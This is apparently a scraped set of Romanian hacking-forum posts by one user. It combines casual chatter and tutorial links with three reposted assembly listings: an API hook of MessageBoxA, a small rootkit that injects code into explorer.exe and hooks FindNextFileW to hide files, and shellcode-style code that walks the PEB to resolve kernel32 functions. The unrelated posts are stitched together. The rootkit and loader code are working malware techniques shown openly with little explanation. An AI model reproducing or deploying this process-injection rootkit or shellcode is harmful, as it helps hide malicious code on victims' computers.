Nytro

Internet Explorer 9 Beta Guide for Developers Contents Introduction All-around browser performance Web standards support for same markup New graphics capabilities harnessing the power of Windows PCs List of New Features Improved Interoperability through Standards Support Cascading Style Sheets, Level 3 (CSS3) CSS3 2D Transforms CSS3 Backgrounds & Borders Module CSS3 Color Module CSS3 Fonts Module CSS3 Media Queries Module CSS3 Namespaces Module CSS3 Values and Units Module CSS3 Selectors Additional CSS Capabilities CSSOM View Module DataURI Document Object Model Improvements Introducing the Enhanced DOM Parsing and Serializing XML to and from the DOM Document Object Model (DOM) Levels 2 and 3 DOM Core (L2 and L3) and Views (L2) DOM Element Traversal DOM L2 and L3 Events DOM L2 HTML DOM L2 Style DOM L2 Traversal and Range DOM Whitespace Handling ECMAScript 5 HTML5 HTML5 video and audio Elements HTML5 canvas Element HTML Parsing Improvements HTML5 Selection APIs HTML5 Semantic Elements ICC Color Profiles Selectors API Level 2 Scalable Vector Graphics (SVG) Basic Shapes Clipping, Masking, and Compositing Coordinate Systems, Transformations, and Units Document Structure Gradients and Patterns Interactivity Linking and Views Painting and Color Paths Text New Tools for Web Developers Pinned Sites Platform Versioning New Document Mode User-agent (UA) String Developer Tools Console tab Network tab User-agent switcher tool Measuring real-world performance Revision History Cateva lucruri utile din HTML5 si CSS3, in relatie cu Internet Explorer 9 (Platform Preview): http://msdn.microsoft.com/en-us/ie/ff468705.aspx

Gavin's Guide to 80x86 Assembly Copyright © Gavin Estey, 1995, 1996. All rights reserved. E un tutorial care ni l-a recomandat laboranta de Arhitectura Sistemelor de Calcul, unde facem Assembly, nu stiu daca l-am mai postat. E aici: http://stuff.pypt.lt/ggt80x86a/asm1.htm

vLaDdO96, astept o explicatie.

Singura problema e ca nu a dat credite cand a copiat tutorialul, desi tutoriale "Cum sa folosesti un program cu 2 butoane" sunt foarte inutile, autorul trebuia mentionat. Apoi, daca e de pe forumul ala de ratati, e 98% infectat. Cred ca toti de acolo au parolele tuturor de acolo, deh, ei sunt hackeri si "stiu" sa foloseasca un program cu 2 butoane. Sfatul meu e in primul rand sa nu va ocupati cu astfel de prostii, doar daca nu aveti cumva un motiv foarte serios, si daca vreti sa folositi asa ceva, cred ca acel forum nu este cea mai buna locatie de unde sa alegeti un astfel de program.

Da, comentezi aiurea, ii dadeam ban pana acum link-ul e scos... Nu vad unde e problema. Doar ca se muta la Gunoi.

Si asa nu o sa gaseasca nici un domeniu cei care chiar ar avea nevoie de unul. Pentru ca 45% dintre voi nu veti folosi nici un domeniu ales, si 45% veti folosi doar unul. Dar ce conteaza ca nu va trebuie, luati sa aveti Eu am luat doar nytro.free, sa speram ca il voi primi prin 2012.

Asta inainte de ce e mai sus: YouTube - Telecomanda Plural - NU STIU

La ce foloseste sa modifici un fisier text?

Parca la Selenity CMS facusem un mic sistem de blogging, dar chiar nu iti recomand porcaria aia ca materia de studiu. Invata HTTP/HTML/PHP/MySQL/JavaScript/CSS si o sa intelegi singur cum se face.

Nu mai bine facem un program util, care sa faca ceva frumos?

Nu am acces, dar daca ii dai lu kwe sarutu ala o sa iti mareasca el spatiu. PS: Sa nu te prind fara o sticla de alcool, poimaine fac 3 zile de cand n-am mai baut :-> A, eu nu merg prea des la scoala, dar am si zile in care stau la aproape toate cursurile. Dai un semn. Mai e cineva la Universitatea Bucuresti la Informatica?

Am avut o mica problema cu mesageria privata, problema se datoreaza vBulletinului si browserelor cred, dar s-a rezolvat. Daca cineva mi-a trimis in ultimul timp un mesaj ce prezinta o anumita importanta, il rog sa imi trimita din nou. Nu voi detalia cauzele problemei, pot sa apara si la alte conturi, dar cred ca singura problema a fost la contul meu datorita unor "teste"

Basic: http://visualbasic.freetutes.com/learn-vb6/ Advanced: http://visualbasic.freetutes.com/learn-vb6-advanced/

Probabil keyloggerul folosea keyboard hook si nu anticul GetAsyncKeyState.

In ziua de azi nu poti scrie un program de 2 linii de cod, deoarece acestea sunt folosite si de tot felul de pseudo-virusi care sunt detectati de toti pseudo-antivirusii. Daca cineva crede ca acest programel e infectat sau face cine stie de tampenie (desi nu vad ce ar putea face) e liber sa analizeze programul, sa il dezasambleze, orice.

Nicolae Guta - Leii grei

Arhitectura calculatorului (sau sistemelor de calcul) - Adrian Atanasiu, Ed. Infodata Programarea procesoarelor Intel (parca) - Vasile Lungu, Ed. Teora

Cel mai bine se invata din carti, dar sunt si tutoriale bune. Eu fac ASM la facultate (la Arhitectura Sistemelor de Calcul - Universitatea Bucuresti, Informatica).

Credits: Alan Website: Ellicit.org .486 .MODEL FLAT, STDCALL OPTION CASEMAP:NONE INCLUDE C:\masm32\include\windows.inc INCLUDE C:\masm32\include\kernel32.inc INCLUDE C:\masm32\include\user32.inc INCLUDELIB C:\masm32\lib\kernel32.lib INCLUDELIB C:\masm32\lib\user32.lib .DATA LibName DB 'user32.dll', 0 APIName DB 'MessageBoxA', 0 .DATA? OgMessageBoxA DD ? .CODE HookAPI PROC Origin:DWORD, Destination:DWORD, CodeLength:DWORD LOCAL Protection:DWORD PUSH ESI PUSH EDI INVOKE VirtualProtect, Origin, CodeLength, PAGE_READWRITE, ADDR Protection MOV EAX, CodeLength ADD EAX, 5h INVOKE VirtualAlloc, NULL, EAX, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE PUSH EAX MOV EDI, EAX MOV ESI, Origin MOV ECX, CodeLength REP MOVSB MOV BYTE PTR [EDI], 0E9h MOV ECX, Origin SUB ECX, EAX SUB ECX, 5h MOV [EDI + 1h], ECX MOV EDI, Origin MOV BYTE PTR [EDI], 0E9h MOV ECX, Destination SUB ECX, Origin SUB ECX, 5h MOV [EDI + 1h], ECX INVOKE VirtualProtect, Origin, CodeLength, Protection, ADDR Protection POP EAX POP EDI POP ESI RET HookAPI ENDP HkMessageBoxA PROC hWnd:DWORD, lpText:DWORD, lpCaption:DWORD, uType:DWORD .IF uType == NULL ;If user application provides NULL/MB_OK we will give them a nice icon too PUSH MB_ICONEXCLAMATION .ELSE PUSH uType .ENDIF PUSH lpCaption PUSH lpText PUSH hWnd CALL OgMessageBoxA ;EAX holds result we could change it here if we wished before returning to the user application RET HkMessageBoxA ENDP ENTRY: INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL ;Non hooked MessageBoxA works as programmer made it INVOKE LoadLibraryA, OFFSET LibName INVOKE GetProcAddress, EAX, OFFSET APIName INVOKE HookAPI, EAX, OFFSET HkMessageBoxA, 0Bh MOV OgMessageBoxA, EAX ;Remember to save the offset for the hooked function to call the original INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL ;Hooked MessageBoxA with our evil icon adding patch INVOKE ExitProcess, NULL END ENTRY COMMENT ^ Win2000SP4.USER32!MessageBoxA 77E38098 > 55 PUSH EBP 77E38099 8BEC MOV EBP,ESP 77E3809B 51 PUSH ECX 77E3809C 833D 3892E677 00 CMP DWORD PTR DS:[77E69238],0 ^

Author: EON - Hi, this code hook the FindNextFileW api to hide all the files that begin with "~". Change the pid for the pid of explorer.exe to saw the effect. ; ******************************************************* ; *** Example of a little rootkit that hide all the *** ; *** files that begin with "~" without use Dll. *** ; *** *** ; *** By E0N (L) 2008 *** ; ******************************************************* include 'H:\archivos de programa\fasm\include\win32ax.inc' .data HookApi db 'FindNextFileW' , 0 ; Name of the api to hook HookDll db 'Kernel32.dll' , 0 ; Name of the DLL that contain it DirApi dd ? ; Direction of the api to hook process dd ? pid dd 2160 ; PID of the process to hook x dd 7 ; Number of bytes that have the api at begin BufferCall dd ? ; Buffer to call the api api (in our process) inyBufferCall dd ? ; Pointer to the buffer to call the api when injected tamFun dd ? ; Size of function that will replace the api inyFun dd ? ; Pointer to this buffer when injected BufferApi dd ? ; 5 bytes buffer for replace the begin of api struct Datos sBufferCall dd ? ; Pointer to inyBufferCall to can call the original api ends dat Datos ? SizeofDatos dd 4 dirStruct dd ? ; Pointer to structure when injected Prote dd ? ; To call VirtualProtect .code start: ; Get handle of process when we will inject mov eax, PROCESS_VM_OPERATION or eax, PROCESS_VM_WRITE invoke OpenProcess, eax, FALSE, [pid] mov [process], eax ; Get direction of api to Hook invoke GetModuleHandle, HookDll invoke GetProcAddress, eax, HookApi mov [DirApi], eax ; Make the buffer to call the api: ; x bytes | 1 byte | 4 byte | 1 byte ; x first bytes of api | push [0x68] | DirApi + x | ret [0xC3] mov eax, dword [x] add eax, 6 invoke LocalAlloc, LPTR, eax ; eax = x + 6 mov [BufferCall], eax invoke RtlMoveMemory, [BufferCall], [DirApi], [x] ; Copiamos los x primeros bytes del api mov eax, [BufferCall] add eax, [x] mov byte [eax], 0x68 inc eax mov ebx, [DirApi] add ebx, [x] mov dword [eax], ebx add eax, 4 mov byte [eax], 0xC3 ; Inject this buffer mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT mov ecx, [x] ; ecx = x + 6 add ecx, 6 invoke VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE mov [inyBufferCall], eax mov ebx, [x] ; ebx = x + 6 add ebx, 6 invoke WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL ; Initialize the structure mov eax, [inyBufferCall] ; Metemos el puntero al buffer para llamar mov [dat.sBufferCall], eax ; con normalidad al api ; Inject structure mov eax, MEM_RESERVE or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE mov [dirStruct], eax invoke WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL ; Change the 0x0000 for a pointer to the structure mov ebx, CAMBIO ; ebx = El 0x0000 que hay que cambiar (4 bytes) sub ebx, 4 invoke VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote invoke RtlMoveMemory, ebx, dirStruct, 4 ; Calculate the size of the function to inject mov eax, FIN_MyFindNextFileW sub eax, MyFindNextFileW mov [tamFun], eax ; Inject the function mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE mov [inyFun], eax invoke WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL ; Make a buffer to hook the api ; 1 bytes | 4 bytes ; jmp [0xE9] | Size of jump invoke LocalAlloc, LPTR, 5 mov [BufferApi], eax mov byte [eax], 0xE9 inc eax mov ebx, [inyFun] sub ebx, [DirApi] sub ebx, 5 ; 5 = -1 por el 0xE9 y -4 por la dirección mov dword [eax], ebx ; Inject this buffer in the begin of api mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE invoke WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL invoke ExitProcess, 0 ; Funtion that will replace the api proc MyFindNextFileW hFindFile, lpFindFileData OK: mov ebx, 0x0000 ; This 0x0000 will do a pointer to the buffer before inject CAMBIO: push [lpFindFileData] push [hFindFile] call dword [ebx] mov ebx, eax cmp ebx, 0 je RETORNAR_FIN mov eax, [lpFindFileData] ; add eax, 44 cmp byte [eax], '~' je OK mov eax, 1 ret RETORNAR_FIN: mov eax, 0 ret endp FIN_MyFindNextFileW: .end start In conclusion, is a little-rootkit without dll.

Credits : HUTCH pour la fonction StringCompare PHRACK pour le tips pour récuperer K32 Reference : NEITSA pour la méthodo Author: steve10120 call .hwndDelta .hwndDelta: pop ebp sub ebp, .hwndDelta .find_kernel: mov eax, [fs:30h] ;EAX = PEB base mov eax, [eax + 0ch] ;EAX = PEB_LDR_DATA mov esi, [eax + 1ch] ;first entry in InInitializationOrderModuleList lodsd ;forward to next LIST_ENTRY mov ebx, [eax + 08h] ;EBX = Kernel32 base memory mov [ebp + _kernelBase], ebx mov esi, dword[ebx + 3Ch] ;ESI = PE MAGIC add esi, [ebp + _kernelBase] mov edx, [esi + 078h] ;EDX = RVA table export add edx, [ebp + _kernelBase] ;EDX = VA table export mov ecx, [edx + 018h] ;ECX = nombre d'export de la DLL mov [ebp + _function_nb], ecx mov ebx, [edx + 020h] ;EBX = VA du pointeur de nom add ebx, 4 add ebx, [ebp + _kernelBase] ;EBX = VA table export ;A partir de la on a tous les éléments pour rechercher les fonctions ;Recuperation de GetProcAddress pushad lea edi, [ebp + _szGetProcAddress] ;EDI = GetProcAddress string call .find_function mov [ebp + _getProcAddress], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Recuperation de LoadLibrary pushad lea edi, [ebp + _szLoadLibrary] ;EDI = GetProcAddress string call .find_function mov [ebp + _loadLibrary], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;TEST MESSAGEBOX ; lea ebx,[ebp +_szUser32] push ebx call [ebp +_loadLibrary] ; lea ebx,[ebp +_szMessageBox] push ebx push eax lea edx, [ebp +_getProcAddress] call dword[edx] ; push 0 lea esi, [ebp +_szGetProcAddress] push esi lea edi, [ebp +_szGetProcAddress] push edi push 0 call eax ;;;;;;;;;;;;;;;; ret .find_function: .find_function_loop: mov esi, dword[ebx] ;ESI = RVA STRING FUNC add ebx, 4 add esi, [ebp + _kernelBase] ;EBX = VA STRING FUNC dec ecx ;ECX = ECX - 1 call .stringCompare cmp eax, -1 je .find_function_loop mov ebx, [edx + 01ch] ; ebx = export table address RVA add ebx, [ebp + _kernelBase] ; pointeur vers table d'export mov edx, dword[_function_nb] sub edx, ecx imul edx, edx, 4 add ebx, edx mov eax, ebx mov eax, dword[eax] add eax, [ebp + _kernelBase] ret .stringCompare: pushad mov ecx, esi mov edx, edi .cmst: mov al, [ecx] cmp al, [edx] jne .no_match add ecx, 1 add edx, 1 test al, al jne .cmst popad xor eax, eax ret .no_match: popad mov eax, -1 ret _szGetProcAddress db "GetProcAddress",0 _szLoadLibrary db "LoadLibraryA",0 _kernelBase dd ? _function_nb dd ? _szMessageBox db "MessageBoxA",0 _szUser32 db "user32.dll",0 _getProcAddress dd ? _loadLibrary dd ?

Nu dai si tu de baut? :->

Da, utilizatori (useri) porno.

Da, tipic. Windu: O sa vezi multe astfel de comentarii, sugestia mea e sa nu le iei in seama.

Voi chiar ati descarcat ce a postat? Dupa ce v-a spus ce contine?